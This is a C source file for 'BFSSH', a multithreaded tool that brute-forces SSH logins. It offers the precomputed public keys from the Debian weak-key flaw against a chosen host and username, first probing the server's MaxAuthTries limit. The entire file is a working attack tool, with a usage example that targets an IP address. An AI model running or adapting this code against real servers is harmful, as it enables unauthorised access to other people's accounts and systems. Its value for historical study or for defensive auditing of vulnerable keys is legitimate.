/*
 * A brute force tool to find any SSH account that allows public key 
 * authentication using a vulnerable key
 *
 * Copyright 2008 Raboin Romain <romain.raboin at gmail.com>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 *
*/

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <libssh/libssh.h>
#include <libssh/priv.h>
#include <pthread.h>


#define DFLT_NBTHREAD	4
#define DFLT_PORT	22
#define MAX_THREADS	256
#define MAX_SESSION	1024

typedef struct
{
	char		*host;
	short		port;
	char		*user;
	char		*ktype;
	char		*ksize;
	char		*arch;
	unsigned int	th;
	unsigned int	maxauthtries;
}	arg_t;

arg_t			gl_arg;


void	*bf_ssh(void *arg)
{
	STRING		*pubk;
 	SSH_OPTIONS	*opt;
	SSH_SESSION	*session;
	unsigned int	mod;
	char		filename[256];
	int		auth;
	int		type;
	int		count;
	int		*id;
	int		thid;

	id = arg;
	thid = *id;
	count = thid * gl_arg.maxauthtries;
	while (1) {
		/* This part is in the loop because it can only be used for
		 * one ssh_connect, it is freed by ssh_disconnect */
		opt = ssh_options_new();

		ssh_options_set_host(opt, gl_arg.host);
		ssh_options_set_port(opt, gl_arg.port);

		session = ssh_new();
		ssh_set_options(session, opt);
		if (ssh_connect(session)) {
			fprintf(stderr,"Connection failed : %s\n", ssh_get_error(session));
			ssh_disconnect(session);
			ssh_finalize();
			return NULL;
		}

		fprintf(stderr,"STATUS: thread: %d test key: %05d ... %05d\r",
			*id, count, count + gl_arg.maxauthtries - 1);
		for (mod = 0; mod < gl_arg.maxauthtries; mod++) {
			snprintf(filename, 255, "./key-%s/%s%s/id_%s.%05d.pub",
				gl_arg.arch, gl_arg.ktype, gl_arg.ksize, gl_arg.ktype, count + mod);
			if ((pubk = publickey_from_file(session, filename, &type)) == NULL) {
 				fprintf(stderr,"\nPublickey from file: %s\n", ssh_get_error(session));
				ssh_finalize();
				return NULL;   
			}
			auth = ssh_userauth_offer_pubkey(session, gl_arg.user, type, pubk);
			if (auth == SSH_AUTH_ERROR)
				fprintf(stderr, "\nSsh userauth offer pubkey: %s\n", ssh_get_error(session));
			else if (auth == SSH_AUTH_DENIED)
				ssh_finalize();
			else {
				printf("\nAuthentication success: %s\n", filename);
				exit(1);
			}
		}
		count += gl_arg.th * gl_arg.maxauthtries;
		ssh_disconnect(session);
		ssh_finalize();
	}
	return NULL;
}

void	usage()
{
	printf("Usage: ./bfssh [options]\n");
	printf("-h: host name\n");
	printf("-u: username\n");
	printf("-p: ssh port\n");
	printf("-d: thread numbers\n");
	printf("-t: key type (rsa / dsa)\n");
	printf("-s: key size (1024 / 2048 / 4096)\n");
	printf("-a: arch (x86 / x86_64)\n");
	printf("\nExample:\n");
	printf("./bfssh -h 192.168.1.1 -u romain -p 22 -d 6 -t rsa -s 2048 -a x86\n");
	exit(0);
}


void	options(int ac, char **av)
{
	int ch;

	memset(&gl_arg, 0, sizeof(gl_arg));
	while ((ch = getopt(ac, av, "h:p:u:d:t:s:a:")) != -1) {
		switch (ch) {
		case 'h':
			gl_arg.host = optarg;
			break;
		case 'p':
			gl_arg.port = atoi(optarg);
			break;
		case 'u' :
			gl_arg.user = optarg;
			break;
		case 'd':
			gl_arg.th = atoi(optarg);
			break;
		case 't':
			gl_arg.ktype = optarg;
			break;
		case 's' :
			gl_arg.ksize = optarg;
			break;
		case 'a' :
			gl_arg.arch = optarg;
			break;
		case '?':
			usage();
		}
	}
	ac -= optind;
	av += optind;

	if (gl_arg.host == NULL) {
		printf("You must specify a host name\n");
		usage();
	}
	if (gl_arg.user == NULL) {
		printf("You must specify a user name\n");
		usage();
	}

	if (gl_arg.th == 0)
		gl_arg.th = 3;
	if (gl_arg.th > MAX_THREADS) {
		printf("Thread number must be less than 256\n");
		gl_arg.th = DFLT_NBTHREAD;
	}
	if (gl_arg.port == 0)
		gl_arg.port = 22;

	if (gl_arg.ktype == NULL)
		gl_arg.ktype = "rsa";	
	if (strcmp(gl_arg.ktype, "rsa") != 0 && strcmp(gl_arg.ktype, "dsa") != 0) {
		printf("Invalid key type\n");
		usage();
	}

	if (gl_arg.ksize == NULL)
		gl_arg.ksize = "2048";
	if (strcmp(gl_arg.ksize, "1024") != 0 && strcmp(gl_arg.ksize, "2048") != 0) {
		printf("Invalid key size\n");
		usage();
	}

	if (gl_arg.arch == NULL)
		gl_arg.arch = "x86";
	if (strcmp(gl_arg.arch, "x86") != 0 && strcmp(gl_arg.arch, "x86_64") != 0) {
		printf("Invalid key size\n");
		usage();
	}
}


/* This function try to find the MaxAuthTries values. */

int	maxauthtries(void)
{
	STRING		*pubk;
 	SSH_OPTIONS	*opt;
	SSH_SESSION	*session;
	char		filename[256];
	int		auth;
	int		type;
	int		count;

	opt = ssh_options_new();
	ssh_options_set_host(opt, gl_arg.host);
	ssh_options_set_port(opt, gl_arg.port);
	session = ssh_new();
	ssh_set_options(session, opt);
	if (ssh_connect(session)) {
		fprintf(stderr,"Connection failed : %s\n", ssh_get_error(session));
		ssh_disconnect(session);
		ssh_finalize();
		return 0;
	}

	for (count = 0; count < MAX_SESSION; count++) {
		snprintf(filename, 255, "./key-%s/%s%s/id_%s.%05d.pub",
			gl_arg.arch, gl_arg.ktype, gl_arg.ksize, gl_arg.ktype, 1);
		if ((pubk = publickey_from_file(session, filename, &type)) == NULL) {
			fprintf(stderr,"Publickey from file: %s\n", ssh_get_error(session));
			ssh_finalize();
			return 0;
		}
		auth = ssh_userauth_offer_pubkey(session, gl_arg.user, type, pubk);
		if (auth == SSH_AUTH_ERROR) {
			ssh_finalize();
			/* return max connection - 1 */
			return count - 1;
		}
	}
	return count - 1;
}

int	main(int ac, char **av)
{
	pthread_t	thread[MAX_THREADS];
	int		id[MAX_THREADS];
	int		rc;
	void		*status;
	unsigned int	i;

	printf("\n == BFSSH a strong debian weak key bruteforcer ==\n\n");
	options(ac, av);
	gl_arg.maxauthtries = maxauthtries();
	if (gl_arg.maxauthtries <= 0) {
		printf("Error: Server doesn't accept Public Key?\n");
		return -1;
	}
	printf("MaxAuthTries: %d\n", gl_arg.maxauthtries);
	for (i = 0; i < gl_arg.th; i++) {
		id[i] = i;
		rc = pthread_create(&thread[i], NULL, bf_ssh, (void *)&id[i]);
		if (rc) {
			fprintf(stderr, "Error: return code from pthread_create() is %d\n", rc);
			return -1;
		}
	}

	for (i = 0; i < gl_arg.th; i++) {
		rc = pthread_join(thread[i], &status);
		if (rc) {
			fprintf(stderr, "Error: return code from pthread_join() is %d\n", rc);
			return -1;
		}
	}
	return 0;
}
